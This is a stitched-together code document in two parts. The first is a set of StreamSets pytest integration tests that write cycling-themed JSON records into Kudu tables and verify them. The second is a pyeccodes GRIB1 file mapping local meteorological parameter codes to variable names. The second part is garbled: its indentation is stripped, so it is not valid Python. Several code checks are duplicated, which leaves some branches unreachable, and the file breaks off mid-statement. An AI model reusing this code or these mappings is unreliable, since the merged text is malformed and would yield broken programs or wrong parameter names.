def test_kudu_destination(sdc_builder, sdc_executor, cluster):
    """Simple Dev Raw Data Source to Kudu pipeline.

    Writes a handful of JSON records into a freshly-created Kudu table and
    verifies, by querying the table back through SQLAlchemy, that every
    record arrived with the expected column values.

    dev_raw_data_source >> kudu
    """
    if not hasattr(cluster, 'kudu'):
        pytest.skip('Kudu tests only run against clusters with the Kudu service present.')
    # Generate some data.
    tour_de_france_contenders = [dict(favorite_rank=1, name='<NAME>', wins=3),
                                 dict(favorite_rank=2, name='<NAME>', wins=3),
                                 dict(favorite_rank=4, name='<NAME>', wins=1),
                                 dict(favorite_rank=3, name='<NAME>', wins=0)]
    # NOTE(review): records are concatenated with no separator; presumably the
    # JSON data format accepts back-to-back objects -- the decimal test below
    # joins with '\n' instead. Confirm which form is intended.
    raw_data = ''.join([json.dumps(contender) for contender in tour_de_france_contenders])
    # For a little more coverage, we'll map the "favorite_rank" record field to the "rank" column in Kudu.
    # These rankings are Dima's opinion and not reflective of the views of StreamSets, Inc.
    field_to_column_mapping = [dict(field='/favorite_rank', columnName='rank')]
    # Random table name keeps concurrent test runs from colliding.
    kudu_table_name = get_random_string(string.ascii_letters, 10)
    kudu_master_address = '{}:{}'.format(cluster.server_host, DEFAULT_KUDU_PORT)
    # Build the pipeline.
    builder = sdc_builder.get_pipeline_builder()
    dev_raw_data_source = builder.add_stage('Dev Raw Data Source').set_attributes(data_format='JSON',
                                                                                 raw_data=raw_data)
    # Kudu tables created through Impala are namespaced 'impala::<db>.<table>'.
    kudu = builder.add_stage('Kudu',
                             type='destination').set_attributes(table_name='{}.{}'.format('impala::default',
                                                                                          kudu_table_name),
                                                                default_operation='INSERT',
                                                                field_to_column_mapping=field_to_column_mapping)
    dev_raw_data_source >> kudu
    pipeline = builder.build().configure_for_environment(cluster)
    pipeline.delivery_guarantee = 'AT_MOST_ONCE'
    # We want to write data once and then stop, but Dev Raw Data Source will keep looping, so we set the rate limit to
    # a low value and will rely upon pipeline metrics to know when to stop the pipeline.
    pipeline.rate_limit = 4
    # Table DDL goes through SQLAlchemy/Impala with Kudu storage properties.
    metadata = sqlalchemy.MetaData()
    tdf_contenders_table = sqlalchemy.Table(kudu_table_name,
                                            metadata,
                                            sqlalchemy.Column('rank', sqlalchemy.Integer, primary_key=True),
                                            sqlalchemy.Column('name', sqlalchemy.String),
                                            sqlalchemy.Column('wins', sqlalchemy.Integer),
                                            impala_partition_by='HASH PARTITIONS 16',
                                            impala_stored_as='KUDU',
                                            impala_table_properties={
                                                'kudu.master_addresses': kudu_master_address,
                                                'kudu.num_tablet_replicas': '1'
                                            })
    try:
        logger.info('Creating Kudu table %s ...', kudu_table_name)
        engine = cluster.kudu.engine
        tdf_contenders_table.create(engine)
        sdc_executor.add_pipeline(pipeline)
        # One input record per batch at this rate limit, so waiting for
        # len(input) batches means every record has been processed.
        sdc_executor.start_pipeline(pipeline).wait_for_pipeline_batch_count(len(tour_de_france_contenders))
        sdc_executor.stop_pipeline(pipeline)
        connection = engine.connect()
        result = connection.execute(sqlalchemy.sql.select([tdf_contenders_table]).order_by('rank'))
        # Rows come back ordered by rank; compare against input sorted the same way.
        assert list(result) == [tuple([item['favorite_rank'], item['name'], item['wins']])
                                for item in sorted(tour_de_france_contenders, key=lambda key: key['favorite_rank'])]
    finally:
        # Always drop the table so repeated runs start clean.
        logger.info('Dropping Kudu table %s ...', kudu_table_name)
        tdf_contenders_table.drop(engine)
@cluster('cdh')
def test_kudu_destination_unixtime_micro_datatype(sdc_builder, sdc_executor, cluster):
    """
    Test Kudu's UNIXTIME_MICRO data type support.

    Writes one record whose 'time' field (epoch milliseconds) is mapped to a
    TIMESTAMP (UNIXTIME_MICRO) column, then reads it back and checks the
    stored value round-trips to the original datetime.

    dev_raw_data_source >> kudu
    """
    if not hasattr(cluster, 'kudu'):
        pytest.skip('Kudu tests only run against clusters with the Kudu service present.')
    # UNIXTIME_MICRO support needs a recent-enough Kudu, shipped with CDH 5.12+.
    if Version(cluster.version) < Version('cdh5.12.0'):
        pytest.skip('Test requires CDH 5.12.0+ to run')
    # Generate some data. Kudu does not store microsecond so set it 0.
    now = datetime.now().replace(microsecond=0)
    # Epoch milliseconds -- the value the Kudu destination converts to UNIXTIME_MICRO.
    now_millisecond = time.mktime(now.timetuple()) * 1000
    input_data = [dict(id=1, time=now_millisecond)]
    raw_data = ''.join([json.dumps(contender) for contender in input_data])
    field_to_column_mapping = [dict(field='/id', columnName='id'),
                               dict(field='/time', columnName='unixtime_micro')]
    # Random table name keeps concurrent test runs from colliding.
    kudu_table_name = get_random_string(string.ascii_letters, 10)
    kudu_master_address = f'{cluster.server_host}:{DEFAULT_KUDU_PORT}'
    # Build the pipeline.
    builder = sdc_builder.get_pipeline_builder()
    dev_raw_data_source = builder.add_stage('Dev Raw Data Source').set_attributes(data_format='JSON',
                                                                                 raw_data=raw_data)
    # Kudu tables created through Impala are namespaced 'impala::<db>.<table>'.
    kudu = builder.add_stage('Kudu',
                             type='destination').set_attributes(table_name='{}.{}'.format('impala::default',
                                                                                          kudu_table_name),
                                                                default_operation='INSERT',
                                                                field_to_column_mapping=field_to_column_mapping)
    dev_raw_data_source >> kudu
    pipeline = builder.build().configure_for_environment(cluster)
    pipeline.delivery_guarantee = 'AT_MOST_ONCE'
    # We want to write data once and then stop, but Dev Raw Data Source will keep looping, so we set the rate limit to
    # a low value and will rely upon pipeline metrics to know when to stop the pipeline.
    pipeline.rate_limit = 4
    # Table DDL goes through SQLAlchemy/Impala; TIMESTAMP maps to UNIXTIME_MICRO in Kudu.
    metadata = sqlalchemy.MetaData()
    test_table = sqlalchemy.Table(kudu_table_name,
                                  metadata,
                                  sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
                                  sqlalchemy.Column('unixtime_micro', sqlalchemy.TIMESTAMP),
                                  impala_partition_by='HASH PARTITIONS 16',
                                  impala_stored_as='KUDU',
                                  impala_table_properties={
                                      'kudu.master_addresses': kudu_master_address,
                                      'kudu.num_tablet_replicas': '1'
                                  })
    try:
        logger.info('Creating Kudu table %s ...', kudu_table_name)
        engine = cluster.kudu.engine
        test_table.create(engine)
        sdc_executor.add_pipeline(pipeline)
        # Wait until as many batches as input records have been processed.
        sdc_executor.start_pipeline(pipeline).wait_for_pipeline_batch_count(len(input_data))
        sdc_executor.stop_pipeline(pipeline)
        connection = engine.connect()
        result = connection.execute(sqlalchemy.sql.select([test_table])).fetchone()
        # The stored timestamp must round-trip back to the original datetime.
        assert list(result) == [1, now]
    finally:
        # Always drop the table so repeated runs start clean.
        logger.info('Dropping Kudu table %s ...', kudu_table_name)
        test_table.drop(engine)
@cluster('cdh')
@sdc_min_version('3.6.0')
def test_kudu_destination_decimal_type(sdc_builder, sdc_executor, cluster):
    """Simple Dev Raw Data Source to Kudu pipeline inserting column of decimal type and checking later on
    decimal type is correctly stored by querying Kudu database

    dev_raw_data_source >> kudu
    """
    if not hasattr(cluster, 'kudu'):
        pytest.skip('Kudu tests only run against clusters with the Kudu service present.')
    # DECIMAL columns were introduced in Kudu 1.7.0.
    if not Version(cluster.kudu.version) >= Version('1.7.0'):
        pytest.skip(f'Test only designed to run on Kudu version >= 1.7.0, but found {cluster.kudu.version}')
    # Generate some data.
    tour_de_france_contenders = [dict(favorite_rank=1, name='<NAME>', wins=3, weight=153.22),
                                 dict(favorite_rank=2, name='<NAME>', wins=3, weight=158.73),
                                 dict(favorite_rank=4, name='<NAME>', wins=1, weight=144),
                                 dict(favorite_rank=3, name='<NAME>', wins=0, weight=165.34)]
    # Newline-delimited JSON records for the Dev Raw Data Source.
    raw_data = '\n'.join([json.dumps(contender) for contender in tour_de_france_contenders])
    field_to_column_mapping = [dict(field='/favorite_rank', columnName='rank'),
                               dict(field='/name', columnName='name'),
                               dict(field='/wins', columnName='wins'),
                               dict(field='/weight', columnName='weight')]
    # Random table name keeps concurrent test runs from colliding.
    kudu_table_name = get_random_string(string.ascii_letters, 10)
    kudu_master_address = '{}:{}'.format(cluster.server_host, DEFAULT_KUDU_PORT)
    # Build the pipeline.
    builder = sdc_builder.get_pipeline_builder()
    dev_raw_data_source = builder.add_stage('Dev Raw Data Source').set_attributes(data_format='JSON',
                                                                                 raw_data=raw_data)
    # Kudu tables created through Impala are namespaced 'impala::<db>.<table>'.
    kudu = builder.add_stage('Kudu',
                             type='destination').set_attributes(table_name='{}.{}'.format('impala::default',
                                                                                          kudu_table_name),
                                                                default_operation='INSERT',
                                                                field_to_column_mapping=field_to_column_mapping)
    dev_raw_data_source >> kudu
    pipeline = builder.build().configure_for_environment(cluster)
    pipeline.delivery_guarantee = 'AT_MOST_ONCE'
    # We want to write data once and then stop, but Dev Raw Data Source will keep looping, so we set the rate limit to
    # a low value and will rely upon pipeline metrics to know when to stop the pipeline.
    pipeline.rate_limit = 4
    # Table DDL goes through SQLAlchemy/Impala; DECIMAL(5, 2) exercises Kudu's decimal support.
    metadata = sqlalchemy.MetaData()
    tdf_contenders_table = sqlalchemy.Table(kudu_table_name,
                                            metadata,
                                            sqlalchemy.Column('rank', sqlalchemy.Integer, primary_key=True),
                                            sqlalchemy.Column('name', sqlalchemy.String),
                                            sqlalchemy.Column('wins', sqlalchemy.Integer),
                                            sqlalchemy.Column('weight', sqlalchemy.DECIMAL(5, 2)),
                                            impala_partition_by='HASH PARTITIONS 16',
                                            impala_stored_as='KUDU',
                                            impala_table_properties={
                                                'kudu.master_addresses': kudu_master_address,
                                                'kudu.num_tablet_replicas': '1'
                                            })
    try:
        logger.info('Creating Kudu table %s ...', kudu_table_name)
        engine = cluster.kudu.engine
        tdf_contenders_table.create(engine)
        sdc_executor.add_pipeline(pipeline)
        # Wait until as many batches as input records have been processed.
        sdc_executor.start_pipeline(pipeline).wait_for_pipeline_batch_count(len(tour_de_france_contenders))
        sdc_executor.stop_pipeline(pipeline)
        connection = engine.connect()
        result = connection.execute(sqlalchemy.sql.select([tdf_contenders_table]).order_by('rank'))
        result_list = list(result)
        # Expected rows: input sorted by rank, with weight quantized to the
        # DECIMAL(5, 2) precision the column stores.
        sorted_tour_de_france_contenders = [tuple([item['favorite_rank'], item['name'], item['wins'],
                                                   round(Decimal(item['weight']), 2)])
                                            for item in sorted(tour_de_france_contenders,
                                                               key=lambda key: key['favorite_rank'])]
        assert result_list == sorted_tour_de_france_contenders
    finally:
        # Always drop the table so repeated runs start clean.
        logger.info('Dropping Kudu table %s ...', kudu_table_name)
        tdf_contenders_table.drop(engine)
|
<filename>pyeccodes/defs/grib1/localConcepts/efkl/cfVarName_def.py
import pyeccodes.accessors as _
def load(h):
def wrapped(h):
table2Version = h.get_l('table2Version')
indicatorOfParameter = h.get_l('indicatorOfParameter')
if table2Version == 253 and indicatorOfParameter == 228:
return 'FFG-MS'
if table2Version == 253 and indicatorOfParameter == 210:
return 'REFLTY-DBZ'
if table2Version == 253 and indicatorOfParameter == 209:
return 'FL-MPLTY-N'
if table2Version == 253 and indicatorOfParameter == 204:
return 'RRH-KGM2'
if table2Version == 253 and indicatorOfParameter == 201:
return 'GRI-KGM2'
if table2Version == 253 and indicatorOfParameter == 201:
return 'GR-KGM2'
if table2Version == 253 and indicatorOfParameter == 200:
return 'TKEN-JKG'
if table2Version == 253 and indicatorOfParameter == 187:
return 'CLDTOP-M'
if table2Version == 253 and indicatorOfParameter == 186:
return 'CLDBASE-M'
if table2Version == 253 and indicatorOfParameter == 185:
return 'RRS-KGM2'
if table2Version == 253 and indicatorOfParameter == 184:
return 'SNRI-KGM2'
if table2Version == 253 and indicatorOfParameter == 184:
return 'SNACC-KGM2'
if table2Version == 253 and indicatorOfParameter == 181:
return 'RRI-KGM2'
if table2Version == 253 and indicatorOfParameter == 163:
return 'WGV-MS'
if table2Version == 253 and indicatorOfParameter == 162:
return 'WGU-MS'
if table2Version == 253 and indicatorOfParameter == 160:
return 'CAPE-JKG'
if table2Version == 253 and indicatorOfParameter == 144:
return 'PRECTYPE-N'
if table2Version == 253 and indicatorOfParameter == 135:
return 'ICINGWARN-N'
if table2Version == 253 and indicatorOfParameter == 125:
return 'VFLMOM-NM2'
if table2Version == 253 and indicatorOfParameter == 124:
return 'UFLMOM-NM2'
if table2Version == 253 and indicatorOfParameter == 122:
return 'FLSEN-JM2'
if table2Version == 253 and indicatorOfParameter == 121:
return 'FLLAT-JM2'
if table2Version == 253 and indicatorOfParameter == 117:
return 'RADGLOA-JM2'
if table2Version == 253 and indicatorOfParameter == 115:
return 'RADLWA-JM2'
if table2Version == 253 and indicatorOfParameter == 114:
return 'RTOPLWA-JM2'
if table2Version == 253 and indicatorOfParameter == 114:
return 'RTOPLW-WM2'
if table2Version == 253 and indicatorOfParameter == 113:
return 'RTOPSWA-JM2'
if table2Version == 253 and indicatorOfParameter == 113:
return 'RTOPSW-WM2'
if table2Version == 253 and indicatorOfParameter == 112:
return 'RNETLWA-JM2'
if table2Version == 253 and indicatorOfParameter == 111:
return 'RNETSWA-JM2'
if table2Version == 253 and indicatorOfParameter == 103:
return 'PWS-S'
if table2Version == 253 and indicatorOfParameter == 102:
return 'HWS-M'
if table2Version == 253 and indicatorOfParameter == 101:
return 'DW-D'
if table2Version == 253 and indicatorOfParameter == 91:
return 'IC-0TO1'
if table2Version == 253 and indicatorOfParameter == 86:
return 'SM-KGM2'
if table2Version == 253 and indicatorOfParameter == 84:
return 'ALBEDO'
if table2Version == 253 and indicatorOfParameter == 83:
return 'SR-M'
if table2Version == 253 and indicatorOfParameter == 81:
return 'LC-0TO1'
if table2Version == 253 and indicatorOfParameter == 76:
return 'CLDWAT-KGKG'
if table2Version == 253 and indicatorOfParameter == 75:
return 'NH-PRCNT'
if table2Version == 253 and indicatorOfParameter == 74:
return 'NM-PRCNT'
if table2Version == 253 and indicatorOfParameter == 73:
return 'NL-PRCNT'
if table2Version == 253 and indicatorOfParameter == 71:
return 'N-0TO1'
if table2Version == 253 and indicatorOfParameter == 67:
return 'MIXHGT-M'
if table2Version == 253 and indicatorOfParameter == 66:
return 'SD-M'
if table2Version == 253 and indicatorOfParameter == 61:
return 'RR-KGM2'
if table2Version == 253 and indicatorOfParameter == 58:
return 'CLDICE-KGKG'
if table2Version == 253 and indicatorOfParameter == 57:
return 'EVAP-KGM2'
if table2Version == 253 and indicatorOfParameter == 54:
return 'PRCWAT-KGM2'
if table2Version == 253 and indicatorOfParameter == 52:
return 'RH-PRCNT'
if table2Version == 253 and indicatorOfParameter == 51:
return 'Q-KGKG'
if table2Version == 253 and indicatorOfParameter == 41:
return 'ABSVO-HZ'
if table2Version == 253 and indicatorOfParameter == 40:
return 'VV-MS'
if table2Version == 253 and indicatorOfParameter == 39:
return 'VV-PAS'
if table2Version == 253 and indicatorOfParameter == 34:
return 'V-MS'
if table2Version == 253 and indicatorOfParameter == 33:
return 'U-MS'
if table2Version == 253 and indicatorOfParameter == 20:
return 'VV-M'
if table2Version == 253 and indicatorOfParameter == 17:
return 'TD-K'
if table2Version == 253 and indicatorOfParameter == 16:
return 'TMIN-C'
if table2Version == 253 and indicatorOfParameter == 15:
return 'TMAX-C'
if table2Version == 253 and indicatorOfParameter == 13:
return 'TP-K'
if table2Version == 253 and indicatorOfParameter == 11:
return 'T-K'
if table2Version == 253 and indicatorOfParameter == 8:
return 'HL-M'
if table2Version == 253 and indicatorOfParameter == 6:
return 'Z-M2S2'
if table2Version == 253 and indicatorOfParameter == 2:
return 'P-PA'
if table2Version == 253 and indicatorOfParameter == 1:
return 'P-PA'
if table2Version == 205 and indicatorOfParameter == 14:
return 'IFF-MS'
if table2Version == 205 and indicatorOfParameter == 13:
return 'IDD-D'
if table2Version == 205 and indicatorOfParameter == 12:
return 'IRCNCT-PRCNT'
if table2Version == 205 and indicatorOfParameter == 11:
return 'IRAFTTHK-CM'
if table2Version == 205 and indicatorOfParameter == 10:
return 'IRIDGC-PRCNT'
if table2Version == 205 and indicatorOfParameter == 9:
return 'IMEANTHK-CM'
if table2Version == 205 and indicatorOfParameter == 8:
return 'IVELV-MS'
if table2Version == 205 and indicatorOfParameter == 7:
return 'IVELU-MS'
if table2Version == 205 and indicatorOfParameter == 6:
return 'IRIDGE-CM'
if table2Version == 205 and indicatorOfParameter == 5:
return 'IMAXTHK-CM'
if table2Version == 205 and indicatorOfParameter == 4:
return 'IMINTHK-CM'
if table2Version == 205 and indicatorOfParameter == 3:
return 'ITHK-CM'
if table2Version == 205 and indicatorOfParameter == 2:
return 'ICNCT-PRCNT'
if table2Version == 205 and indicatorOfParameter == 1:
return 'TSEA-C'
if table2Version == 203 and indicatorOfParameter == 255:
return 'PRECFORM2-N'
if table2Version == 203 and indicatorOfParameter == 254:
return 'CIN-500-N'
if table2Version == 203 and indicatorOfParameter == 253:
return 'CAPE1040-500'
if table2Version == 203 and indicatorOfParameter == 252:
return 'CAPE-0-3-500'
if table2Version == 203 and indicatorOfParameter == 251:
return 'CAPE-0-3'
if table2Version == 203 and indicatorOfParameter == 250:
return 'EL-500-M'
if table2Version == 203 and indicatorOfParameter == 249:
return 'LFC-500-M'
if table2Version == 203 and indicatorOfParameter == 248:
return 'LCL-500-M'
if table2Version == 203 and indicatorOfParameter == 247:
return 'EL-500-HPA'
if table2Version == 203 and indicatorOfParameter == 246:
return 'LFC-500-HPA'
if table2Version == 203 and indicatorOfParameter == 245:
return 'LCL-500-HPA'
if table2Version == 203 and indicatorOfParameter == 244:
return 'CIN-N'
if table2Version == 203 and indicatorOfParameter == 243:
return 'CAPE1040'
if table2Version == 203 and indicatorOfParameter == 242:
return 'CAPE-500'
if table2Version == 203 and indicatorOfParameter == 241:
return 'CAPE-JKG'
if table2Version == 203 and indicatorOfParameter == 240:
return 'EL-M'
if table2Version == 203 and indicatorOfParameter == 239:
return 'LFC-M'
if table2Version == 203 and indicatorOfParameter == 238:
return 'LCL-M'
if table2Version == 203 and indicatorOfParameter == 237:
return 'EL-HPA'
if table2Version == 203 and indicatorOfParameter == 236:
return 'LFC-HPA'
if table2Version == 203 and indicatorOfParameter == 235:
return 'LCL-HPA'
if table2Version == 203 and indicatorOfParameter == 234:
return 'F100-FF-MS'
if table2Version == 203 and indicatorOfParameter == 233:
return 'F90-FF-MS'
if table2Version == 203 and indicatorOfParameter == 232:
return 'F75-FF-MS'
if table2Version == 203 and indicatorOfParameter == 231:
return 'F50-FF-MS'
if table2Version == 203 and indicatorOfParameter == 230:
return 'F25-FF-MS'
if table2Version == 203 and indicatorOfParameter == 229:
return 'F10-FF-MS'
if table2Version == 203 and indicatorOfParameter == 228:
return 'F0-FF-MS'
if table2Version == 203 and indicatorOfParameter == 227:
return 'F100-FFG-MS'
if table2Version == 203 and indicatorOfParameter == 226:
return 'F90-FFG-MS'
if table2Version == 203 and indicatorOfParameter == 225:
return 'F75-FFG-MS'
if table2Version == 203 and indicatorOfParameter == 224:
return 'F50-FFG-MS'
if table2Version == 203 and indicatorOfParameter == 223:
return 'F25-FFG-MS'
if table2Version == 203 and indicatorOfParameter == 222:
return 'F10-FFG-MS'
if table2Version == 203 and indicatorOfParameter == 221:
return 'F0-FFG-MS'
if table2Version == 203 and indicatorOfParameter == 220:
return 'F100-N-0TO1'
if table2Version == 203 and indicatorOfParameter == 219:
return 'F90-N-0TO1'
if table2Version == 203 and indicatorOfParameter == 218:
return 'F75-N-0TO1'
if table2Version == 203 and indicatorOfParameter == 217:
return 'F50-N-0TO1'
if table2Version == 203 and indicatorOfParameter == 216:
return 'F25-N-0TO1'
if table2Version == 203 and indicatorOfParameter == 215:
return 'F10-N-0TO1'
if table2Version == 203 and indicatorOfParameter == 214:
return 'F0-N-0TO1'
if table2Version == 203 and indicatorOfParameter == 213:
return 'RRRS-KGM2'
if table2Version == 203 and indicatorOfParameter == 212:
return 'GRR-MMH'
if table2Version == 203 and indicatorOfParameter == 211:
return 'VEGET-N'
if table2Version == 203 and indicatorOfParameter == 210:
return 'VFLMOM-NM2'
if table2Version == 203 and indicatorOfParameter == 209:
return 'UFLMOM-NM2'
if table2Version == 203 and indicatorOfParameter == 208:
return 'TKEN-JKG'
if table2Version == 203 and indicatorOfParameter == 207:
return 'SOILTY-N'
if table2Version == 203 and indicatorOfParameter == 206:
return 'ILSAA1-N'
if table2Version == 203 and indicatorOfParameter == 205:
return 'CAPE1040-MU'
if table2Version == 203 and indicatorOfParameter == 204:
return 'CAPE-0-3-MU'
if table2Version == 203 and indicatorOfParameter == 203:
return 'FLMOM-PA'
if table2Version == 203 and indicatorOfParameter == 202:
return 'FLSEN-JM2'
if table2Version == 203 and indicatorOfParameter == 201:
return 'FLLAT-JM2'
if table2Version == 203 and indicatorOfParameter == 200:
return 'CANW-KGM2'
if table2Version == 203 and indicatorOfParameter == 199:
return 'CIN-MU-N'
if table2Version == 203 and indicatorOfParameter == 198:
return 'O3ANOM-PRCNT'
if table2Version == 203 and indicatorOfParameter == 197:
return 'UVI-N'
if table2Version == 203 and indicatorOfParameter == 196:
return 'UVIMAX-N'
if table2Version == 203 and indicatorOfParameter == 195:
return 'CAPE-MU-JKG'
if table2Version == 203 and indicatorOfParameter == 194:
return 'EL-MU-M'
if table2Version == 203 and indicatorOfParameter == 193:
return 'F100-RR-6'
if table2Version == 203 and indicatorOfParameter == 192:
return 'F90-RR-6'
if table2Version == 203 and indicatorOfParameter == 191:
return 'F75-RR-6'
if table2Version == 203 and indicatorOfParameter == 190:
return 'F50-RR-6'
if table2Version == 203 and indicatorOfParameter == 189:
return 'F25-RR-6'
if table2Version == 203 and indicatorOfParameter == 188:
return 'F10-RR-6'
if table2Version == 203 and indicatorOfParameter == 187:
return 'F0-RR-6'
if table2Version == 203 and indicatorOfParameter == 186:
return 'SM-KGM2'
if table2Version == 203 and indicatorOfParameter == 185:
return 'LFC-MU-M'
if table2Version == 203 and indicatorOfParameter == 184:
return 'LCL-MU-M'
if table2Version == 203 and indicatorOfParameter == 183:
return 'SR-M'
if table2Version == 203 and indicatorOfParameter == 182:
return 'EL-MU-HPA'
if table2Version == 203 and indicatorOfParameter == 181:
return 'LFC-MU-HPA'
if table2Version == 203 and indicatorOfParameter == 180:
return 'LCL-MU-HPA'
if table2Version == 203 and indicatorOfParameter == 179:
return 'F100-T-K'
if table2Version == 203 and indicatorOfParameter == 178:
return 'F90-T-K'
if table2Version == 203 and indicatorOfParameter == 177:
return 'F75-T-K'
if table2Version == 203 and indicatorOfParameter == 176:
return 'F50-T-K'
if table2Version == 203 and indicatorOfParameter == 175:
return 'F25-T-K'
if table2Version == 203 and indicatorOfParameter == 174:
return 'F10-T-K'
if table2Version == 203 and indicatorOfParameter == 173:
return 'F0-T-K'
if table2Version == 203 and indicatorOfParameter == 172:
return 'TTI-N'
if table2Version == 203 and indicatorOfParameter == 171:
return 'VTI-N'
if table2Version == 203 and indicatorOfParameter == 170:
return 'CTI-N'
if table2Version == 203 and indicatorOfParameter == 169:
return 'LI-N'
if table2Version == 203 and indicatorOfParameter == 168:
return 'SI-N'
if table2Version == 203 and indicatorOfParameter == 167:
return 'MIXHGT-M'
if table2Version == 203 and indicatorOfParameter == 166:
return 'RSI-KGM2'
if table2Version == 203 and indicatorOfParameter == 165:
return 'RRI-KGM2'
if table2Version == 203 and indicatorOfParameter == 164:
return 'SRMOM-M'
if table2Version == 203 and indicatorOfParameter == 163:
return 'MOL-M'
if table2Version == 203 and indicatorOfParameter == 161:
return 'PROBSN-0TO1'
if table2Version == 203 and indicatorOfParameter == 159:
return 'EFI-RR'
if table2Version == 203 and indicatorOfParameter == 158:
return 'EFI-WG'
if table2Version == 203 and indicatorOfParameter == 157:
return 'EFI-T'
if table2Version == 203 and indicatorOfParameter == 156:
return 'EFI-WS'
if table2Version == 203 and indicatorOfParameter == 155:
return 'PROB-WG-3'
if table2Version == 203 and indicatorOfParameter == 154:
return 'PROB-WG-2'
if table2Version == 203 and indicatorOfParameter == 153:
return 'PROB-WG-1'
if table2Version == 203 and indicatorOfParameter == 152:
return 'PROB-W-2'
if table2Version == 203 and indicatorOfParameter == 151:
return 'PROB-W-1'
if table2Version == 203 and indicatorOfParameter == 150:
return 'TPE3-C'
if table2Version == 203 and indicatorOfParameter == 149:
return 'FF1500-MS'
if table2Version == 203 and indicatorOfParameter == 148:
return 'HLCY-1-M2S2'
if table2Version == 203 and indicatorOfParameter == 147:
return 'HLCY-M2S2'
if table2Version == 203 and indicatorOfParameter == 146:
return 'WSH-1-KT'
if table2Version == 203 and indicatorOfParameter == 145:
return 'WSH-KT'
if table2Version == 203 and indicatorOfParameter == 144:
return 'PROB-RR-4'
if table2Version == 203 and indicatorOfParameter == 143:
return 'PROB-RR-3'
if table2Version == 203 and indicatorOfParameter == 142:
return 'PROB-RR-2'
if table2Version == 203 and indicatorOfParameter == 141:
return 'PROB-RR-1'
if table2Version == 203 and indicatorOfParameter == 134:
return 'PROB-T-4'
if table2Version == 203 and indicatorOfParameter == 133:
return 'PROB-T-3'
if table2Version == 203 and indicatorOfParameter == 132:
return 'PROB-T-2'
if table2Version == 203 and indicatorOfParameter == 131:
return 'PROB-T-1'
if table2Version == 203 and indicatorOfParameter == 130:
return 'ABSH-KGM3'
if table2Version == 203 and indicatorOfParameter == 129:
return 'TPE-K'
if table2Version == 203 and indicatorOfParameter == 128:
return 'RNETSW-WM2'
if table2Version == 203 and indicatorOfParameter == 126:
return 'RTOPLW-WM2'
if table2Version == 203 and indicatorOfParameter == 122:
return 'Z-C6-M2S2'
if table2Version == 203 and indicatorOfParameter == 121:
return 'Z-C5-M2S2'
if table2Version == 203 and indicatorOfParameter == 120:
return 'Z-C4-M2S2'
if table2Version == 203 and indicatorOfParameter == 119:
return 'Z-C3-M2S2'
if table2Version == 203 and indicatorOfParameter == 118:
return 'Z-C2-M2S2'
if table2Version == 203 and indicatorOfParameter == 117:
return 'Z-C1-M2S2'
if table2Version == 203 and indicatorOfParameter == 116:
return 'T-C6-C'
if table2Version == 203 and indicatorOfParameter == 115:
return 'T-C5-C'
if table2Version == 203 and indicatorOfParameter == 114:
return 'T-C4-C'
if table2Version == 203 and indicatorOfParameter == 113:
return 'T-C3-C'
if table2Version == 203 and indicatorOfParameter == 112:
return 'T-C2-C'
if table2Version == 203 and indicatorOfParameter == 111:
return 'T-C1-C'
if table2Version == 203 and indicatorOfParameter == 110:
return 'SNR-KGM2'
if table2Version == 203 and indicatorOfParameter == 109:
return 'SNRC-KGM2'
if table2Version == 203 and indicatorOfParameter == 108:
return 'SNRL-KGM2'
if table2Version == 203 and indicatorOfParameter == 107:
return 'SNC-KGM2'
if table2Version == 203 and indicatorOfParameter == 106:
return 'SNL-KGM2'
if table2Version == 203 and indicatorOfParameter == 105:
return 'CLDCND-KGKG'
if table2Version == 203 and indicatorOfParameter == 104:
return 'CLDICE-KGKG'
if table2Version == 203 and indicatorOfParameter == 103:
return 'ICING-N'
if table2Version == 203 and indicatorOfParameter == 102:
return 'SSICING-N'
if table2Version == 203 and indicatorOfParameter == 101:
return 'RHO-KGM3'
if table2Version == 203 and indicatorOfParameter == 100:
return 'IC-0TO1'
if table2Version == 203 and indicatorOfParameter == 99:
return 'LC-0TO1'
if table2Version == 203 and indicatorOfParameter == 96:
return 'RADGLO-WM2'
if table2Version == 203 and indicatorOfParameter == 95:
return 'RADLW-WM2'
if table2Version == 203 and indicatorOfParameter == 91:
return 'HESSAA-N'
if table2Version == 203 and indicatorOfParameter == 89:
return 'ALBEDO'
if table2Version == 203 and indicatorOfParameter == 80:
return 'KINDEX-N'
if table2Version == 203 and indicatorOfParameter == 79:
return 'N-PRCNT'
if table2Version == 203 and indicatorOfParameter == 78:
return 'CLDWAT-KGKG'
if table2Version == 203 and indicatorOfParameter == 77:
return 'LSSN-M100'
if table2Version == 203 and indicatorOfParameter == 75:
return 'TG-K'
if table2Version == 203 and indicatorOfParameter == 74:
return 'LNSP-N'
if table2Version == 203 and indicatorOfParameter == 73:
return 'RRRL-KGM2'
if table2Version == 203 and indicatorOfParameter == 72:
return 'RRRC-KGM2'
if table2Version == 203 and indicatorOfParameter == 71:
return 'RRR-KGM2'
if table2Version == 203 and indicatorOfParameter == 70:
return 'H0C-M'
if table2Version == 203 and indicatorOfParameter == 69:
return 'RNETLW-WM2'
if table2Version == 203 and indicatorOfParameter == 68:
return 'SNACC-KGM2'
if table2Version == 203 and indicatorOfParameter == 63:
return 'RRC-MM10'
if table2Version == 203 and indicatorOfParameter == 62:
return 'RRL-MM10'
if table2Version == 203 and indicatorOfParameter == 60:
return 'SMOGI-N'
if table2Version == 203 and indicatorOfParameter == 59:
return 'PRECFORM-N'
if table2Version == 203 and indicatorOfParameter == 58:
return 'RR-3-MM'
if table2Version == 203 and indicatorOfParameter == 57:
return 'RR-2-MM'
if table2Version == 203 and indicatorOfParameter == 56:
return 'RR-1-MM'
if table2Version == 203 and indicatorOfParameter == 55:
return 'RR-12-MM'
if table2Version == 203 and indicatorOfParameter == 54:
return 'RR-6-MM'
if table2Version == 203 and indicatorOfParameter == 53:
return 'HSADE2-N'
if table2Version == 203 and indicatorOfParameter == 52:
return 'HSADE1-N'
if table2Version == 203 and indicatorOfParameter == 51:
return 'SD-M'
if table2Version == 203 and indicatorOfParameter == 50:
return 'RR-MM10'
if table2Version == 203 and indicatorOfParameter == 47:
return 'PRCWAT-KGM2'
if table2Version == 203 and indicatorOfParameter == 44:
return 'VV-MS'
if table2Version == 203 and indicatorOfParameter == 43:
return 'VV-MMS'
if table2Version == 203 and indicatorOfParameter == 40:
return 'VV-PAS'
if table2Version == 203 and indicatorOfParameter == 39:
return 'FF10-MS'
if table2Version == 203 and indicatorOfParameter == 38:
return 'AQI-N'
if table2Version == 203 and indicatorOfParameter == 31:
return 'ABSVO-HZ-5'
if table2Version == 203 and indicatorOfParameter == 28:
return 'HM20C-M'
if table2Version == 203 and indicatorOfParameter == 27:
